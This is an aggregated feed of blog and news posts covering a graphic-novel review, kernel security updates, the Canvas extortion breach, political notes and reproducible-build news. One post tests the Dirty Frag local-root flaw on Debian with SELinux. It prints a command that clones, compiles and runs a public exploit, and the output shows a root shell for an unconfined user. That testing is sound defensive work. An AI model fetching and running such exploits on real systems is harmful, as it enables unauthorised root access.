These familial duties leave Cannon isolated, with only one important friendship: Trish, an up-and-coming novelist whom Cannon has known since their school days in Montreal's suburban Eastern Townships, where they were the only queer Chinese girls either of them knew. Trish owes her professional acclaim to her own neurotic social instincts, which she polishes on the page with the help of an old writing teacher who serves as her mentor. Trish may be Cannon's oldest and best friend, but she's not actually a very good friend, and now that they're both in their 30s, neither Cannon nor Trish is entirely sure where they'd make new friends.

This is where Cannon starts, as Cannon tries to resolve all these bad situations, each of which is only worsening. Trish disapproves of Cannon's sexual affair with the new front-of-house woman at the restaurant – even as Trish begins a friends-with-benefits arrangement with a guy from her fitness club who clearly wants more than the odd tumble. Guy the restaurateur positions Cannon as his hatchet-woman and confidante, driving conflict in the kitchen that she is meant to hold the bag for. Her grandfather enters a terminal decline, and still her mother won't answer her calls and texts about it. And then, Cannon discovers that Trish has violated her in a way that is intimate and appalling.

These may sound like the beats that you'd find in a melodramatic soap opera, but Cannon's affect is so stoic, and her interiority is so beautifully and inventively depicted – Lai deploying the unique strengths of the graphic novel form here with total virtuosity – that the vibe is more David Lynch than Dallas.

The result is something that's beautiful, sharp, critical and lingering. Long after I closed the cover, I found myself mulling over the delicate ways that Lai raised the contradictions, sorrows and beauty of queer love, racial identity, camaraderie, self-control, and self-indulgence. Lai's characters have no answers, only questions that can never be fully resolved. Instead, these questions are the defining puzzles, defeats and triumphs of their lives.

It's a magnificent, sensitive and innovative work of storytelling.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Ebay paying newspapers to run listings in the classifieds section https://web.archive.org/web/20010506063910/http://www.business2.com/news/2001/05/ebaypapers.htm

#20yrsago Airline spoons of the world photo-gallery https://www.flickr.com/photos/airlinespoons

#20yrsago Coach passengers arrested for moving to first class http://news.bbc.co.uk/1/hi/england/manchester/4980364.stm

#15yrsago Hidden cognitive costs of doing stuff https://web.archive.org/web/20110507154653/https://us.lifehacker.com/5798202/the-cognitive-cost-of-doing-things

#15yrsago Syria’s man-in-the-middle attack on Facebook https://www.eff.org/deeplinks/2011/05/syrian-man-middle-against-facebook

#10yrsago Weird erotica author who was dragged into Hugo Awards mess pulls off epic troll https://web.archive.org/web/20160506175535/http://www.dailydot.com/lol/chuck-tingle-trolling-hugo-zoe-quinn-genius/

#10yrsago FBI has been harassing a Tor developer since 2015, won’t tell her or her lawyer why https://blog.patternsinthevoid.net/fbi-harassment.html

#10yrsago 2,000 US doctors endorse Sanders’ single-payer healthcare proposal https://web.archive.org/web/20160506095034/https://www.washingtonpost.com/news/wonk/wp/2016/05/05/2000-doctors-say-bernie-sanders-has-the-right-approach-to-health-care/

#10yrsago Community college evicts daycare center to make room for Goldman Sachs https://www.golocalprov.com/news/daycare-center-being-moved-out-of-ccri-for-goldman-sachs

#10yrsago Data-driven look at America’s brutal, racist debt-collection machine https://www.propublica.org/article/so-sue-them-what-weve-learned-about-the-debt-collection-lawsuit-machine

#10yrsago Homeland Security wants to subpoena Techdirt over the identity of a hyperbolic commenter https://www.techdirt.com/2016/05/06/homeland-security-wants-to-subpoena-us-over-clearly-hyperbolic-techdirt-comment/

#5yrsago NY AG attributes Net Neutrality fraud to telcos https://pluralistic.net/2021/05/06/boogeration/#pais-lies

#5yrsago Ed-tech apps spy on kids https://pluralistic.net/2021/05/06/boogeration/#i-spy

#5yrsago Scammers recycled covid nose-swabs https://pluralistic.net/2021/05/06/boogeration/#up-your-nose

#1yrago The Adventures of Mary Darling https://pluralistic.net/2025/05/06/nevereverland/#lesser-ormond-street


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

12:42

Error'd: Null Null Null [The Daily WTF]

The single most common category of entries for this column is failed handling of NaN, null and undefined. Almost exclusively from javascript in web pages, sometimes in node servers, and almost never any other languages or frameworks. They're getting a bit repetitive but it's our solemn duty to call out failure where we find it. So if you send us one of these, make sure it identifies the source!

"If you want something you've never had, do something you've never done" exhorted Ben.

15d2acdeb1844f2fb6dcd79699dee683

"Dashed Hope for Jennifer Null," titled an entry from some guy[sic]. "As recently linked from TDWTF article "Not for Nullthing", not only names can break computer systems, but also article content." Stretching, but we'll allow it.

5d69cd67830c4a3789e96f556bb542bf

"Where does Batman go on holiday?" asked Morgan. "Nananananana... Nowhere!"

15345eee6a7d4fe383cecf5cb74d1aa2

"UBER is ready for driverless vehicles..." Bruce C. "Uber is getting so big, they can't even keep track of their driver's names."

30fbd331dde44f639735138146d97f51

"Well at least the reason wasn't null or NaN," wrote Steve W. regarding CenturyLink. "I've been trying for weeks to use their web page to change my (incorrect billing address). Such progress."

eb3472b715ab4124896b37d7ca47eaec

Additional entries on the topic from
Dan : "we're fresh out of null"
Henrik : "What is this null music streaming service"
Mike : "Name: undefined"
Laks : "In this app, every new user defaults to a nullptr."
and
Jim : "Think I'll buy $NaCar with this refund!"
and many others were all appreciated and noted.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

11:35

Four stable kernels with partial fixes for Dirty Frag [LWN.net]

Greg Kroah-Hartman has announced the release of the 7.0.5, 6.18.28, 6.12.87, and 6.6.138 stable kernels. These kernels contain a partial fix for the Dirty Frag and Copy Fail 2 security flaws. Kroah-Hartman has confirmed that a second patch is required, but it is still in development and has not yet been merged.

10:35

Girl Genius for Friday, May 08, 2026 [Girl Genius]

The Girl Genius comic for Friday, May 08, 2026 has been posted.

10:07

Kinds of fast [Seth's Blog]

There’s the fast of a drag racer. Purpose-built, difficult to steer, expensive and fragile.

There’s the fast of the marathon runner. Beat by a sprinter every time, but able to keep it up for hours.

And the fast of a well-integrated team. Communications, clarity, and respect enable them to produce far more in less time.

Or consider the fast of the craftsperson who spends most of her time studying, measuring, and sharpening before even beginning.

We could choose the fast of the iterator, who produces a dozen or a hundred variations in the time a resistance-fueled perfectionist produces just one. Sometimes it’s faster to do it over than it is to do it right the first time.

And there’s the fast of the follower, copying what came before, avoiding false starts and errors and only coming out ahead at the end.

There’s the fast of the resilient and quick agile professional, who builds with the unexpected in mind. Flexible and not brittle.

You can have the fast-per-project of a custom one-off, or the fast per unit of a high-quality mass-production process.

The fast of chickening out and getting back to work, or the fast of dancing with the chicken and doing what matters.

Or the fast of the well-maintained craft, which rarely gets sidelined with a crisis.

What they all have in common is intent. Each requires trade-offs and is chosen with a purpose in mind.

And then, of course, there’s the slow of “let’s see what happens” or “we always do it this way” or “I don’t care enough to do this well.”

09:14

Retroactive [Penny Arcade]

New Comic: Retroactive

07:35

Daniel Baumann: Debian: Linux Vulnerability Mitigation (Dirty Frag) [Planet Debian]

After Copy Fail [CVE-2026-31431] from last week, the new Linux local root privilege escalations of today are Dirty Frag (Part 1) aka Copy Fail 2 [CVE-2026-43284] and Dirty Frag (Part 2) [CVE-2026-43500].

For those who can not update to linux >= 7.0.4-1 that was uploaded to sid and contains the needed fixes (backports for trixie are available in trixie-fastforward-backports), or are waiting for backports and updates to older Debian releases, or can’t reboot on short notice, mitigations might be needed.

Given the current trend, it seems we will see more of these bugs in the future. Therefore, I’ve uploaded a new package linux-vulnerability-mitigation to sid containing the mitigation for both Copy Fail and Dirty Frag (with debconf multiselect).

Until it passed NEW, it can also be downloaded from here:

The package is architecture independent, has no dependencies, and can be installed on any version of Debian or Debian derivative.

Update: Updated text above and descriptions in linux-vulnerability-mitigation for Dirty Frag Part 2 [CVE-2026-43500].

06:49

Russell Coker: Dirty Frag on Debian and SE Linux [Planet Debian]

Hot on the heels of the Copy Fail vulnerability [1] there is a new vulnerability Dirty Frag [2] (I linked to the Alma Linux page because it’s the first one I saw and it explains things well).

The Test System

The test system was running kernel 6.19.14+deb14-amd64 and had the configuration after my last test of Copy Fail which was a default configuration with the following commands run:

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
semanage login -m -s root -r s0 root
# logout and login again
semodule -X 100 -r unconfined

Strict Policy is Not Vulnerable

I did a quick test on a Debian SE Linux system with a user running as user_t (which is often referred to as “strict policy”) and got the following result:

test@testing1:~/t$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 11.47 MiB/s, done.
Resolving deltas: 100% (9/9), done.
dirtyfrag: failed (rc=1)
test@testing1:~/t/dirtyfrag$ ./exp 
dirtyfrag: failed (rc=1)

I checked the audit log and saw the following:

# audit2allow -al
#============= user_t ==============
allow user_t self:rxrpc_socket create;
allow user_t self:user_namespace create;

It seems that the rxrpc_socket access is the main thing.

I did a search for domains permitted to use that class on a system without unconfined domains and saw the following:

# sesearch -A -c rxrpc_socket
allow daemon init_t:rxrpc_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:rxrpc_socket getattr;
allow sosreport_t domain:rxrpc_socket getattr;
allow sysadm_t domain:rxrpc_socket getattr;

This configuration doesn’t appear to be vulnerable, at least to this form of the attack.

Unconfined Domains

I reinstalled the unconfined policy with the following command and assigned it to the user test2 with the following commands:

semodule -X 100 -i /usr/share/selinux/default/unconfined.pp.bz2
semanage login -a -s unconfined_u test2
restorecon -R -v -F /home/test2

I then tested the exploit as user test2 and got the following result:

test2@testing1:~$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 16.57 MiB/s, done.
Resolving deltas: 100% (9/9), done.
# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# 

The kernel message log had the following lines from the time of the attack:

[ 1310.861545] Initializing XFRM netlink socket
[ 1310.909048] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni))
[ 1310.909935] alg: No test for echainiv(authencesn(hmac(sha256),cbc(aes))) (echainiv(authencesn(hmac-sha256-lib,cbc-aes-aesni)))
[ 1318.353602] process 'su' launched '/bin/sh' with NULL argv: empty string added

Conclusion

It seems that we will be getting a lot of these so running SE Linux users as user_t is the right thing to do for servers and multi user systems.

04:49

FFS code review with Protesilaos [Planet GNU]

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

Yesterday we had our second session focused on ffs, which I recorded and share publicly with everyone with Prot's permission, so that others can also benefit from Prot's insights and experience as we discuss various aspects of Emacs package development with the concrete example of ffs.

Here is the video recording of our session:

Sorry, this embedded video will not work, because your web browser does not support HTML5 video.
[ please watch the video in your favourite streaming media player ]​

You can view or download the full-resolution video from the Internet Archive.

I addressed most of Prot's feedback about ffs from our first session, and I'll be working on the changes we discussed in this session in the next days.

In the last third of the video we switched topics to discuss a few Emacs-related tangents including adding a 'padding' effect for the mode line and its constructs, and distilling and separating the easily-reusable package-like parts of one's Emacs configuration from the actual configuration of those parts (e.g. the distinction of prot-lisp and prot-emacs-modules in Prot's Emacs configuration).

For mode line padding, here is the snippet I'm using with Prot's doric-themes:

(doric-themes-with-colors
  (custom-set-faces
   `(mode-line
     ((t :box (:line-width 6 :color ,bg-shadow-intense))))
   `(mode-line-inactive
     ((t :box (:line-width 6 :color ,bg-shadow-subtle))))
   `(mode-line-highlight
     ((t :box (:color ,bg-shadow-intense))))))

Take care, and so long for now.

04:07

Canvas Breach Disrupts Schools & Colleges Nationwide [Krebs on Security]

An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service’s login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.

A screenshot shared by a reader showing the extortion message that was shown on the Canvas login page today.

Canvas parent firm Instructure responded to today’s defacement attacks by disabling the platform, which is used by thousands of schools, universities and businesses to manage coursework and assignments, and to communicate with students.

Instructure acknowledged a data breach earlier this week, after the cybercrime group ShinyHunters claimed responsibility and said they would leak data on tens of millions of students and faculty unless paid a ransom. The stated deadline for payment was initially set at May 6, but it was later pushed back to May 12.

In a statement on May 6, Instructure said the investigation so far shows the stolen information includes “certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as as messages among users.” The company said it found no evidence the breached data included more sensitive information, such as passwords, dates of birth, government identifiers or financial information.

The May 6 update stated that Canvas was fully operational, and that Instructure was not seeing any ongoing unauthorized activity on their platform. “At this stage, we believe the incident has been contained,” Instructure wrote.

However, by mid-day on Thursday, May 7, students and faculty at dozens of schools and universities were flooding social media sites with comments saying that a ransom demand from ShinyHunters had replaced the usual Canvas login page. Instructure responded by pulling Canvas offline and replacing the portal with the message, “Canvas is currently undergoing scheduled maintenance. Check back soon.”

“We anticipate being up soon, and will provide updates as soon as possible,” reads the current message on Instructure’s status page.

While the data stolen by ShinyHunters may or may not contain particularly sensitive information (ShinyHunters claims it includes several billion private messages among students and teachers, as well as names, phone numbers and email addresses), this attack could hardly have come at a worse time for Instructure: Many of the affected schools and universities are in the middle of final exams, and a prolonged outage could be highly damaging for the company.

The extortion message that greeted countless Canvas users today advised the affected schools to negotiate their own ransom payments to prevent the publication of their data — regardless of whether Instructure decides to pay.

“ShinyHunters has breached Instructure (again),” the extortion message read. “Instead of contacting us to resolve it they ignored us and did some ‘security patches.'”

A source close to the investigation who was not authorized to speak to the press told KrebsOnSecurity that a number of universities have already approached the cybercrime group about paying. The same source also pointed out that the ShinyHunters data leak blog no longer lists Instructure among its current extortion victims, and that the samples of data stolen from Canvas customers were removed as well. Data extortion groups like ShinyHunters will typically only remove victims from their leak sites after receiving an extortion payment or after a victim agrees to negotiate.

Dipan Mann, founder and CEO of the security firm Cloudskope, slammed Instructure for referring to today’s outage as a “scheduled maintenance” event on its status page. Mann said Shiny Hunters first demonstrated they’d breached Instructure on May 1, prompting Instructure’s Chief Information Security Officer Steve Proud to declare the following day that the incident had been contained. But Mann said today’s attack is at least the third time in the past eight months that Instructure has been breached by ShinyHunters.

In a blog post today, Mann noted that in September 2025, ShinyHunters released thousands of internal University of Pennsylvania files — donor records, internal memos, and other confidential materials — through what the Daily Pennsylvanian and other outlets later determined was, in part, a Canvas/Instructure-mediated access path.

“Penn was the named victim,” Mann wrote. “Instructure was the mechanism. The incident was treated as a Penn-specific story by most of the national press and quietly handled by Instructure as a customer-specific matter. That framing was wrong then. It is dramatically more wrong in light of the May 2026 events, which now look like the planned escalation of an attack pattern that ShinyHunters had been working against Instructure’s environment for at least eight months prior. The September 2025 Penn breach was the proof of concept. The May 1, 2026 incident was the production run. The May 7, 2026 recompromise was ShinyHunters demonstrating publicly that the May 2 ‘containment’ did not happen.”

In February, a ShinyHunters spokesperson told The Daily Pennsylvanian that Penn failed to pay a $1 million ransom demand. On March 5, ShinyHunters published 461 megabytes worth of data stolen from Penn, including thousands of files such as donor records and internal memos.

ShinyHunters is a prolific and fluid cybercriminal group that specializes in data theft and extortion. They typically gain access to companies through voice phishing and social engineering attacks that often involve impersonating IT personnel or other trusted members of a targeted organization.

Last month, ShinyHunters relieved the home security giant ADT of personal information on 5.5 million customers. The extortion group told BleepingComputer they breached the company by compromising an employee’s Okta single sign-on account in a voice phishing attack that enabled access to ADT’s Salesforce instance. BleepingComputer says ShinyHunters recently has taken credit for a number of extortion attacks against high-profile organizations, including Medtronic, Rockstar Games, McGraw Hill, 7-Eleven and the cruise line operator Carnival.

The attack on Canvas customers is just one of several major cybercrime campaigns being launched by ShinyHunters at the moment, said Charles Carmakal, chief technology officer at the Google-owned Mandiant Consulting. Carmakal declined to comment specifically on the Canvas breach, but said “there are multiple concurrent and discrete ShinyHunters intrusion and extortion campaigns happening right now.”

Cloudskope’s Mann said what happens next depends largely on whether Instructure’s customers — the universities, K-12 districts, and education ministries paying for Canvas — choose to apply pressure or absorb the breach quietly.

“The history of education-vendor incidents suggests the path of least resistance is the second one,” he concluded.

Update, May 8, 11:05 a.m. ET: Instructure has published an incident update page that includes more information about the breach. Instructure said its Canvas portal is functioning normally again, and that the hackers exploited an issue related to Free-for-Teacher accounts.

“This is the same issue that led to the unauthorized access the prior week,” Instructure wrote. “As a result, we have made the difficult decision to temporarily shut down Free-for-Teacher accounts. These accounts have been a core part of our platform, and we’re committed to resolving the issues with these accounts.”

Instructure said affected organizations were notified on May 6.

“If your organization is affected, Instructure will contact your organization’s primary contacts directly,” the update states. “Please don’t rely on third-party lists or social media posts naming potentially affected organizations as those lists aren’t verified. Instructure will confirm validated information through direct outreach to all affected organizations.”

Update, May 11, 10:16 p.m. ET: Instructure posted an update saying they paid their extortionists in exchange for a promise to destroy the stolen data. “The data was returned to us,” the update reads. “We received digital confirmation of data destruction (shred logs). We have been informed that no Instructure customers will be extorted as a result of this incident, publicly or otherwise.”

01:21

00:07

Drawing Penny Arcade [Penny Arcade]

I’ve posted another time lapse of the comic drawing process. This one is for Tattooine, the Maul comic strip we posted yesterday. If you like seeing how the sausage gets made, check it out below! 

00:00

Urgent: Robert Reich's site paywalled [Richard Stallman's Political Notes]

Sad news: Robert Reich's site has become paywalled. As a result, access to an article there requires running nonfree JavaScript code (https://gnu.org/philosophy/javascript-trap.html) and requires identifying oneself by using a payment account. Each of these consequences is unjust, and I have a moral obligation not to refer people to pages that require such things.

I can't let the links remain here as they are, but they are numerous and it will take time to deal with all of them.

The articles I linked to did not have that problem when I made the links.

Urgent: Executive order could label millions of Americans as domestic terrorists [Richard Stallman's Political Notes]

US citizens: call on Congress to refuse to fund Trump’s executive order that could label millions of Americans as domestic terrorists, or in any fashion block it.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Stand up for science [Richard Stallman's Political Notes]

US citizens: call on Congress to stand up for science, not polluter profits.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Drop bogus charges against James Comey [Richard Stallman's Political Notes]

US citizens: call on the Department of supposed Justice to drop bogus charges against James Comey and stop persecuting political speech.

Increase in FBI personnel working on "immigration-related matters" [Richard Stallman's Political Notes]

*There were 279 FBI personnel working on "immigration-related matters" [i.e., persecution] before [the persecutor] took office in January 2025, according to bureau records The Intercept obtained through a Freedom of Information Act request. By September, that number had ballooned to more than 6,500.

Global heating will isolate New Orleans and Baton Rough [Richard Stallman's Political Notes]

Global heating will isolate New Orleans and Baton Rough in the middle of the sea, miles away from land. New Orleans must start now to move to higher ground.

Supreme court ruling on voting rights act [Richard Stallman's Political Notes]

*Six supreme court justices handed down a ruling built, ostensibly, on the belief that the US has changed so much as to render the protections of the Voting Rights Act unnecessary. No one should be that gullible.*

Activists from flotilla captured jailed by Israel [Richard Stallman's Political Notes]

Activists Israel captured on the recent Gaza aid flotilla are being jailed in Israel. They told their lawyers that they are being held in solitary confinement, blindfolded.

Israel claims they are part of a group which it accuses of working secretly with HAMAS. That would be a bad thing if true, but I won't believe it on Israel's say-so. That is a standard way that right-wing extremists in the US and Israel try to smear anyone that defends the rights of Palestinians.

Even supposing that is true, it can't justify abuse of prisoners by Israel.

Executive agencies ignoring US courts [Richard Stallman's Political Notes]

*[Executive agencies are] increasingly ignoring US courts, new analysis shows.

Critics warn that respect for rule of law could break down as executive branch flouts judicial decisions.*

Zambia cancelled RightsCon conference [Richard Stallman's Political Notes]

Zambia agreed to hold the RightsCon conference this May, but canceled it shortly before it happened.

The article speculates this was due to pressure from China, and there may have been such pressure, but I have a hunch that the Zambian ruler objected to the event's support for equal rights for queer people. Zambia is very repressive in that area.

Starmer trying to label defense of Palestine as antisemitism [Richard Stallman's Political Notes]

Starmer is seeking a path to label defense of Palestine as antisemitism.

Once you accept that identification, you will inevitably take an unjust stance on at least one of the two issues.

Starmer Labour called itself the "adults" [Richard Stallman's Political Notes]

Starmer Labour called itself the "adults", meaning the ones who would prevent adoption of mad policies such as raising taxes on the rich. Rich people from increases in taxation, thus leaving a choice of various policies that won't solve the big problem of impoverishing the non-rich.

With a right-wing party in power, the "adults" may try to stop it from tearing up the legal system and constitution. However, with an ostensibly left-wing party in power, the "adults" try to prevent any major economic changes that could once again direct a large part of the country's productive capacity to the non-rich.

TikTok's "For You" pages prioritize pro-Republican messages [Richard Stallman's Political Notes]

* Researchers found that TikTok's "For You" pages prioritized pro-Republican [messages] in New York, Texas and Georgia.*

The research operated many dummy accounts and tallied how what the site showed them, comparing that with the preferences that the account showed by which videos it cut off.

The experiment does not reveal how the site chose the videos it chose to present to each user. We don't know whether the site was specifically programmed to show more right-wing messages. Perhaps the site prefers characteristics that are more often found in right-wing messages.

But ultimately that design detail is not very important. What matter is that TikTok spreads right-wing bias.

Accusation Modi's party stole election [Richard Stallman's Political Notes]

The leftist premier of West Bengal has accused Modi's party of stealing the election.

This is plausible, given the laws they adopted to deprive Muslims of Indian citizenship if they don't have written proof of it. One of the two laws (which operate together) is explicitly biased against Muslims.

Thursday, 07 May

23:49

Fedora Project Leader says he doesn’t care about the reputational damage from Fedora embracing “AI” [OSnews]

On the Fedora forums, there’s a long-running thread about a proposal for Fedora to build a variant of the distribution aimed specifically at “AI”. The “problem” identified in the proposal is that setting up the various parts that a developer in the “AI” space needs is currently quite difficult on Fedora, and as such, a bunch of technical steps need to be taken to make this easier. Setting aside the “AI” of the proposal and ensuing discussion, it’s actually a very interesting read, going deep into the weeds about consequential questions like building an LTS kernel on Fedora, support for out-of-tree kernel mods, and a lot more.

To spoil the ending: the proposal has already been approved unanimously by the Fedora Council, meaning the efforts laid out in the proposal will be undertaken. This means that, depending on progress, we’ll see a Fedora “AI” Desktop or whatever it’s going to be called somewhere in the timeframe from Fedora 45 to Fedora 47. As a Fedora user on all my machines, I’m obviously not too happy about this, since I’d much rather the scarce resources of a project like Fedora goes towards things not as ethically bankrupt, environmentally destructive, and artistically deficient as “AI”, but in the end it’s a project owned and controlled by IBM, so it’s not exactly unexpected.

What really surprised me in this entire discussion is a post by Fedora Project Leader Jef Spaleta, responding to worries people in the thread were having about such a big “AI” undertaking under the Fedora branding causing serious reputational damage to Fedora as a whole. These concerns are clearly valid, as people really fucking hate “AI”, doubly so in the open source community whose work especially “AI” coding tools are built on without any form of consent. As such, Fedora undertaking a big “AI” desktop project is bound to have a negative impact on Fedora’s image. Just look at what aggressively pushing Copilot has done to Windows 11’s already shit reputation.

Spaleta, however, just doesn’t care. Literally.

As the Fedora Project Leader, I am absolutely not concerned about the reputational damage to this project that comes with setting up an entirely new output attractive to developers who want to make use of Ai tools.

↫ Jef Spaleta

I’ve been looking at this line on and off for a few days now, and I just can’t wrap my head around how the leader of an open source project built on and relying on the free labour of thousands of contributors says he doesn’t care about reputational damage to the project he’s leading. Effective and capable open source contributors are not exactly a commodity, and a lot of the decisions they make about what projects to donate their time to are based on vibes and personal convictions – you can’t really pay them to look the other way. Saying you don’t care about reputational damage to your huge open source project seems rather shortsighted, but of course, I don’t lead a huge open source project so what do I know?

In the linked thread alone, one long-time Fedora contributor, Fernando Mancera, already decided to leave the project on the spot, and I have a sneaking suspicion he won’t be the last. “AI” is a deeply tainted hype on many levels, and the more you try to chase this dragon, the more capable people you’ll end up chasing away.

23:00

Page 11 [Flipside]

Page 11 is done.

05/07/26 [Flipside]

Gonna be at Anime Minneapolis this weekend, in the artist alley! Hope to see some of you there!

Reproducible Builds: Reproducible Builds in April 2026 [Planet Debian]

Welcome to our April 2026 report from the Reproducible Builds project!

Our reports outline what we’ve been up to over the past month, highlighting items of news from elsewhere in the increasingly-important area of software supply-chain security. As ever, if you are interested in contributing to the Reproducible Builds project, please see the Contribute page on our website.

In this month’s report, we cover:

  1. Tor stateless relays and Reproducible Builds
  2. Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux
  3. Reproducible Builds at LinuxFest NorthWest
  4. Reproducibility issues in Rust binaries that embed random bytes
  5. Distribution work
  6. Patches
  7. diffoscope development
  8. Documentation updates
  9. Misc news


Tor stateless relays and Reproducible Builds

An interesting post was published on Tor Project blog by Osservatorio Nessuno OdV this month on “stateless relays”. These are stateless, diskless operating systems that are designed to be used as Tor exit relays. According to the post, which is titled A Server That Forgets: Exploring Stateless Relays:

For relay operators, this approach raises the security bar by enforcing better behaviors by design: […]

  1. Reproducibility. A system that doesn’t change between reboots is easier to verify and, eventually, to reproduce and audit.

Furthermore, using a Trusted Platform Module (TPM), could allow for greater integrity in the future:

Transparency logs. Once you have a measured boot chain, you can publish it. A relay operator provides a recipe for a reproducible build; anyone can recompute the expected hash and verify it matches what the TPM reports. An append-only transparency log can make these attestations publicly auditable. The Tor community could run an independent monitor to track this across the relay fleet.


Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux

Congratulations to the Civil Infrastructure Platform (CIP) for reaching their 10-year anniversary last month. CIP has been a supporter of Reproducible Builds for many years, and we have collaborated on a number of technical issues that overlap. As Chris Lamb mentions in CIP’s press release:

The collaboration between the Reproducible Builds project and CIP highlights a critical shift in how we approach industrial software. Through verifiability, CIP ensures that the open source foundation of our critical infrastructure is not only sustainable but also demonstrably secure. This commitment to transparency is vital for the trust and resilience required by critical systems over decades of operation.”


Reproducible Builds at LinuxFest NorthWest

Vagrant Cascadian and Chris Lamb hosted a table in the exposition hall at LinuxFest NorthWest 2026 this month in Bellingham, WA, USA, introducing many people to Reproducible Builds and answering questions both days of the conference.

In addition, Vagrant presented Beyond Trusting Open Source Software on Sunday afternoon, exploring the intersection of Free/Open Source Software, Reproducible Builds and Bootstrappable builds, and how they all reinforce each other. Vagrant’s slides are available online, including source code to build them reproducibly.


Reproducibility issues in Rust binaries that embed random bytes

Reproducible Builds developer kpcyrd opened a ticket on the Rustsec issue tracker regarding binaries that deliberately inject random bytes into their binaries “as a secret seed for a Hash Collision DoS mitigation.”

As kpcyrd notes in his message, this causes issues for reproducibility, and because the relevant end-user binaries are “mostly distributed pre-compiled through package managers, those binaries (and by extension the secret seed) are public knowledge”. kpcyrd goes on to note:

This is somewhat unique to Rust because Python/JavaScript doesn’t compile binaries, and Go (to my knowledge) is too restrictive during build for any library to pull something like this.


Distribution work

In Arch Linux this month, Robin Candau and Mark Hegreberg worked at adding a new repro tag/version to the Arch Linux Docker images providing a bit-for-bit reproducible image. Robin also shared a related announcement and implementation details on our mailing list.

Arch Linux developer Robin Candau posted a blog post announcing that “Arch Linux Now Has a Bit-for-Bit Reproducible Docker Image”. Robin mentions one interesting caveat:

to ensure reproducibility, the pacman [package manager] keys have to be stripped from the image, meaning that pacman is not usable out of the box in this image. While waiting to find a suitable solution to this technical constraint, we are therefore providing this reproducible image under a dedicated tag as a first milestone. []

The blog post was also discussed on Hacker News.


In Debian this month, 24 reviews of Debian packages were added, 7 were updated and 16 were removed this month adding to our knowledge about identified issues.

